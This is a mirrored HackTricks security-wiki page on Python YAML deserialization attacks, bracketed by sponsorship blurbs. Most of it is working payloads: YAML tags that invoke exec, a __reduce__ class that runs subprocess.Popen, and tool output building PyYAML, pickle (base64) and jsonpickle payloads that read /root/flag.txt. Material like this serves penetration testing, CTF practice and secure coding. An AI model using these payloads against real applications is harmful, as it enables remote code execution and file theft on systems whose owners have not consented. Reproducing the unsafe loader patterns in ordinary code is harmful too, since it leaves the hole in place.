mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 20:43:29 +00:00
182 lines
7.5 KiB
Markdown
182 lines
7.5 KiB
Markdown
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
|
||
# Yaml **Deserialization**
|
||
|
||
**Yaml** python libraries is also capable to **serialize python objects** and not just raw data:
|
||
|
||
```
|
||
print(yaml.dump(str("lol")))
|
||
lol
|
||
...
|
||
|
||
print(yaml.dump(tuple("lol")))
|
||
!!python/tuple
|
||
- l
|
||
- o
|
||
- l
|
||
|
||
print(yaml.dump(range(1,10)))
|
||
!!python/object/apply:builtins.range
|
||
- 1
|
||
- 10
|
||
- 1
|
||
```
|
||
|
||
Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
|
||
|
||
![](<../../.gitbook/assets/image (628) (1).png>)
|
||
|
||
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
|
||
|
||
```python
|
||
import yaml
|
||
from yaml import UnsafeLoader, FullLoader, Loader
|
||
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
|
||
|
||
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
|
||
print(yaml.load(data, Loader=Loader)) #range(1, 10)
|
||
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
print(yaml.unsafe_load(data)) #range(1, 10)
|
||
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||
|
||
#The other ways to load data will through an error as they won't even attempt to
|
||
#deserialize the python object
|
||
```
|
||
|
||
The previous code used **unsafe\_load** to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
|
||
|
||
## Basic Exploit
|
||
|
||
Example on how to **execute a sleep**:
|
||
|
||
```python
|
||
import yaml
|
||
from yaml import UnsafeLoader, FullLoader, Loader
|
||
data = b'!!python/object/apply:time.sleep [2]'
|
||
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
|
||
print(yaml.load(data, Loader=Loader)) #Executed
|
||
print(yaml.load_all(data))
|
||
print(yaml.load_all(data, Loader=Loader))
|
||
print(yaml.load_all(data, Loader=UnsafeLoader))
|
||
print(yaml.load_all(data, Loader=FullLoader))
|
||
print(yaml.unsafe_load(data)) #Executed
|
||
print(yaml.full_load_all(data))
|
||
print(yaml.unsafe_load_all(data))
|
||
```
|
||
|
||
## Vulnerable .load("\<content>") without Loader
|
||
|
||
**Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)`
|
||
|
||
You can find the [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is:
|
||
|
||
```yaml
|
||
!!python/object/new:str
|
||
state: !!python/tuple
|
||
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
||
- !!python/object/new:Warning
|
||
state:
|
||
update: !!python/name:exec
|
||
```
|
||
|
||
Or you could also use this **one-liner provided by @ishaack**:
|
||
|
||
```yaml
|
||
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
|
||
```
|
||
|
||
Note that in **recent versions** you cannot **no longer call `.load()`** **without a `Loader`** and the **`FullLoader`** is **no longer vulnerable** to this attack.
|
||
|
||
# RCE
|
||
|
||
Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml
|
||
|
||
```python
|
||
import yaml
|
||
from yaml import UnsafeLoader, FullLoader, Loader
|
||
import subprocess
|
||
|
||
class Payload(object):
|
||
def __reduce__(self):
|
||
return (subprocess.Popen,('ls',))
|
||
|
||
deserialized_data = yaml.dump(Payload()) # serializing data
|
||
print(deserialized_data)
|
||
|
||
#!!python/object/apply:subprocess.Popen
|
||
#- ls
|
||
|
||
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
|
||
print(yaml.load(deserialized_data, Loader=Loader))
|
||
print(yaml.unsafe_load(deserialized_data))
|
||
```
|
||
|
||
## Tool to create Payloads
|
||
|
||
The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
|
||
|
||
```bash
|
||
python3 peas.py
|
||
Enter RCE command :cat /root/flag.txt
|
||
Enter operating system of target [linux/windows] . Default is linux :linux
|
||
Want to base64 encode payload ? [N/y] :
|
||
Enter File location and name to save :/tmp/example
|
||
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
|
||
Done Saving file !!!!
|
||
|
||
cat /tmp/example_jspick
|
||
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
|
||
|
||
cat /tmp/example_pick | base64 -w0
|
||
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
|
||
|
||
cat /tmp/example_yaml
|
||
!!python/object/apply:subprocess.Popen
|
||
- !!python/tuple
|
||
- cat
|
||
- /root/flag.txt
|
||
```
|
||
|
||
# References
|
||
|
||
For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
|
||
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
|